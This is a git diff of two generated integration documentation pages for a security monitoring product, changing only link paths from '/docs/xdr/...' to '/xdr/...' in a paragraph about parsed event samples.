"miss_record" diff --git a/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md b/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md index 78bad17f20..4fa4d1c9e6 100644 --- a/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md +++ b/_shared_content/operations_center/integrations/generated/ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "access.json" diff --git a/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md b/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md index c3ea25e739..147d0ebcc3 100644 --- a/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md +++ b/_shared_content/operations_center/integrations/generated/ff53e0db-059b-4e16-ba90-8c4dbf5cee35.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_event_1.json"